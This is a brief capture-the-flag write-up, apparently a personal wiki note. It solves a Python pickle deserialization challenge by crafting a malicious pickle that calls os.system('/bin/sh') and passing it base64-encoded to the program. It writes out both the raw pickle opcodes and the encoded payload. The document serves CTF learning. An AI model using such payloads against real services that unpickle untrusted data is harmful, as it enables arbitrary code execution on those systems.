![c137eac00d2400170113147f39020439.png](09e8c92baec849e6bc1d374cbcce8e39.png) ![b13965659266c0000667abac7fd4b2f6.png](25edeac7ae614c838e7efaa9f312a3e5.png) The interesting function is `import` Breaking the `import` function gives us an error ![059c87ed0ef3beee17af98c35484bd86.png](d6eae773fd604cfaa6c2a9f9a230fa11.png) So it wants a **base64** encoded pickle object and we need to read the flag. Let's get a shell using a malicious pickle object. reading: https://checkoway.net/musings/pickle/ ``` cos system (S'/bin/sh' tR. ``` base64 encoding that gives us `Y29zCnN5c3RlbQooUycvYmluL3NoJwp0Ui4=` and passing that to the program... ![a38a9edbb6e81a02fa0cc4e00f256497.png](171fb505de1b4d20831160e69e136111.png) --- Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]] Tags: #ctf #python #pickle #deserialization #pwn Related: [[Peak Hill]]